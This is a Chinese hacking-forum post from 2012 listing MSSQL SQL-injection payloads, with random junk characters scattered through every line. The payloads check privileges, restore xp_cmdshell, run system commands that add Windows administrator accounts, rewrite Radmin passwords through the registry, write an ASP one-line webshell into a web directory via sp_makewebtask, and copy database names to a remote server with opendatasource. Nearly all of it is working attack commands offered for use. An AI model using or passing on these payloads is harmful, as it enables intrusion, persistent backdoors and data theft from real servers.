找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1988|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令3 Q# a( O  t. v+ x* G% j7 Y# v
//看看是什么权限的
# V3 z; b; c8 G9 E* l1 u9 Oand 1=(Select IS_MEMBER('db_owner')); i+ u* \" |: N4 ]+ @$ K
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--; Y4 J$ f+ C6 i

$ R: r  x, \$ X4 S8 I+ L4 h//检测是否有读取某数据库的权限
2 d2 I2 o# X( d  F5 Y# Tand 1= (Select HAS_DBACCESS('master')); `; u" }& j0 O6 t4 j% `; U! Y
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --8 C2 V# a% k" o% C+ y
4 R7 o6 n' I* K& W
( W) p  Q+ C7 k/ `
数字类型3 V' Z) r) d& m5 v+ ^( D/ R
and char(124)%2Buser%2Bchar(124)=0
" y& R5 F, j( \% \7 s2 h1 X  f; @( Q: L& \$ z; D
字符类型
" T8 Q% E" f* }+ Z. F  C' and char(124)%2Buser%2Bchar(124)=0 and ''='
) _; k3 m/ [3 r% o* i( n
2 R( W6 ?+ \! |1 O. s  _. m/ s搜索类型
. \3 b9 n1 o0 R; \; N$ N' and char(124)%2Buser%2Bchar(124)=0 and '%'='
# I, i" r8 c2 i- ~; c
0 a2 W, @; P( G4 v爆用户名
! |5 r2 \) H/ X/ Z: l1 fand user>0! h' h6 E: Y0 B: v, R6 R
' and user>0 and ''=') ^- b' d/ `/ }5 Y5 I$ D
; M( U1 Y. J, [
检测是否为SA权限1 s( f( L' B8 M
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--# S! n1 M0 ^  W% \5 O5 e
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
8 s/ P8 V0 [/ s# }2 n, @1 H9 w. S. b1 M" }$ ]1 S+ Q
检测是不是MSSQL数据库
5 ?: S' a- j4 H+ k" Q" mand exists (select * from sysobjects);--
' A7 {. A' w/ u; y4 H# X3 h' z2 {0 M/ L1 S* |* u) m3 J9 C
检测是否支持多行
; ^: \/ C2 p3 Z) W! z4 h3 p5 Y;declare @d int;-- 7 z$ }  j6 k: ~7 G/ N
) M; e  h+ x; ^7 m6 C
恢复 xp_cmdshell
2 i- d8 R7 l+ F2 q+ ?;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
, L1 \; l  |+ m# \0 U( @. [( S" O: P; g) W

4 Y! ~0 a- u6 F/ ]5 S0 ?) wselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') $ s% |2 {; P, U0 A

" [7 }( M% m: }//-----------------------
* ?$ y( I( C# G# E//      执行命令
3 r. E+ C/ O: I6 @/ i! l+ R6 }2 X0 p//-----------------------3 [- S/ n# A% X6 k- ?
首先开启沙盘模式:8 R& f, e8 L8 h
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
( K1 g- b' ~5 N4 s/ N3 c+ B% L* t- f: M! _
然后利用jet.oledb执行系统命令& A# X" E, _/ g7 c8 i' S
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
% f' K: i! K* U) `, X; b; A7 @" }9 S! F! ]! T! A6 u. X) w7 Q8 E
执行命令/ `: ^5 x$ Q! ^$ `( i: X
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
# G' Z5 |- `; u7 e
+ G' M3 D- `% K8 F) pEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'8 s; @% p, K/ O8 L2 M) A
7 H0 C% y* W+ r9 j1 b
判断xp_cmdshell扩展存储过程是否存在:
# q9 {4 A  G* b$ v( bhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')/ h* U  t6 H" K+ h) ]3 m

% p& L, D; R, I6 l写注册表8 F0 i# w9 B' r7 u
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',19 r) E/ }/ \( b

7 c' U! D3 S/ ]: @REG_SZ  t- _# a, F9 ?# x$ J- [
4 _4 J" ^* l# R* e! J6 r& g" v" d
读注册表
3 g& Y. B! u' texec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
2 q* }( i; O9 [) G2 @: S0 E: k
2 g1 ?- K5 U7 Z  J0 k2 m( Y+ ~4 h读取目录内容- w4 Y+ u" E( u8 {
exec master..xp_dirtree 'c:\winnt\system32\',1,1
  m$ H9 S. P* h9 B0 o% e/ A8 E% y, E

( e4 n( P3 O& X4 g( d2 A- ~数据库备份
1 M7 K, s! c1 J  H: _; P+ wbackup database pubs to disk = 'c:\123.bak'
$ ?$ w& {& t4 O9 ]7 u7 F( Y, ~5 q! N  K; e, k
//爆出长度
9 u9 h1 H. D& v, w: k$ |And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--/ f# i8 p# M" S& T3 R

; G4 |% i1 K4 B, S5 K; F2 w0 ?0 @9 \. U2 l

" {3 t* \$ t5 _; e4 z更改sa口令方法:用sql综合利用工具连接后,执行命令:
- p+ w6 S9 ]; n$ P2 Gexec sp_password NULL,'新密码','sa'
8 F0 h" h, _2 w4 l! {
  O9 I  t5 }" T2 `! h添加和删除一个SA权限的用户test:
8 t5 N" n3 p& F4 Mexec master.dbo.sp_addlogin test,ptlove
( a/ `) n9 g! ~" L; t8 Vexec master.dbo.sp_addsrvrolemember test,sysadmin
) a% j4 i# s9 i* `/ N+ [2 Q  M/ W
删除扩展存储过过程xp_cmdshell的语句:
- j" ^) C7 L/ V  g* D! Xexec sp_dropextendedproc 'xp_cmdshell'% |1 h1 I+ Y. ~& V! ^5 q; P! w

# j6 q: V# q3 ^4 _) [添加扩展存储过过程7 j! n( F7 N. r  Y8 S3 E( [! e
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
4 W6 d) @7 R, a4 {% a) }1 IGRANT exec On xp_proxiedadata TO public ) Z# z0 X/ \( R& U

) g) v- n& q/ K! ~2 J
- h9 _+ W* X2 c) c停掉或激活某个服务。 2 F' Z/ p7 }9 d3 n, h& I
; J' V. ~% d! e& w
exec master..xp_servicecontrol 'stop','schedule'
3 }! {8 p3 k: N9 ~exec master..xp_servicecontrol 'start','schedule', R) N9 g% R, k# P* D

3 _9 e: A( p" F) W* s  t5 {: ^1 \dbo.xp_subdirs# u& }, ]& {5 S+ i' |; @
6 I& e6 H, E3 J% |# Q
只列某个目录下的子目录。* y: Z9 E6 z& o+ [4 A: Z
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
7 _: {1 e8 G0 L( x& _) @
* e9 H( ~: @' r7 S: mdbo.xp_makecab9 w' }) B$ }" O  ?- O
3 p& S8 f" L# p& i) Z5 X7 l, j
将目标多个档案压缩到某个目标档案之内。7 R. a/ s, u- E) a1 \" n' A1 }- k
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
# Z. P$ }* Y/ P! U' z0 U/ O% R: e" R
dbo.xp_makecab
1 E/ j$ [* H8 |1 l1 I/ B'c:\test.cab','mszip',1,
) Z- o! }$ c5 j7 ]% ^- }8 L'C:\Inetpub\wwwroot\SQLInject\login.asp',
$ h1 |/ P8 M  R  c" U( F; i'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'8 G& C# u& u# b. I3 U

3 G! y3 }7 b' ?" n: L5 Wxp_terminate_process. {4 E$ ~" o7 P; p
: j. @* E  h! x+ x4 [- f$ X
停掉某个执行中的程序,但赋予的参数是 Process ID。' k* n* s2 W- u) F& A$ l
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
0 z7 L2 ]9 v$ b$ K$ M6 d! r3 j5 y9 a% V+ i' e* G: X
xp_terminate_process 2484
0 U+ F4 d+ t6 I) z2 Y% S, p! [; p, [7 r, n* a7 D8 p
xp_unpackcab/ Y8 y% n: D, c$ F0 p
! ?# v, f5 d6 X& N
解开压缩档。1 z8 u2 C$ ^. S+ d- a
1 d  A# B+ O% B7 |, n% r# j( o8 y
xp_unpackcab 'c:\test.cab','c:\temp',1  [+ G. \1 Z- n) d+ B( R

: f4 J! y& C' N% r: x. s; C" H5 m( T( ?9 K$ n7 k. d: G; P* ~! ~* J
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
7 \& Q/ E- C1 B
2 \( _5 l6 G$ b3 G+ f' zcreate database lcx;* r' _, ?" g9 q( X
Create TABLE ku(name nvarchar(256) null);
5 P. y, W$ `1 d; f( v5 C0 a. oCreate TABLE biao(id int NULL,name nvarchar(256) null);+ H( J- n% K  V: m8 |  j9 L, s

! j$ J7 U& Y4 e- W! c2 d//得到数据库名, T8 D* @+ \, G
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases3 a7 i8 s' g8 C2 k+ i- J, \' H
- r+ j0 ^- Z# z' J1 |" r# X
1 A9 i. l( q% _8 ^
//在Master中创建表,看看权限怎样
  N2 S6 p6 P8 t; GCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--. q9 R6 p1 s! b% B) E2 F& k, R

1 H3 n% X7 l# |* k6 j. Z9 I用 sp_makewebtask直接在web目录里写入一句话马:  Q8 O) _" F  T( Y" y! W: e+ M  L
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--6 A6 T. A0 j$ W1 ~  i
& j9 W; l, t0 s; u, ?: }
//更新表内容; a  J4 f7 H8 `; z1 q# \0 B& Z( D
Update films SET kind = 'Dramatic' Where id = 1239 w3 i+ V5 t- l) H
; j$ R/ |. L4 S
//删除内容1 r6 l7 }, y* A$ _) b4 T! R- e; N+ n, o
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表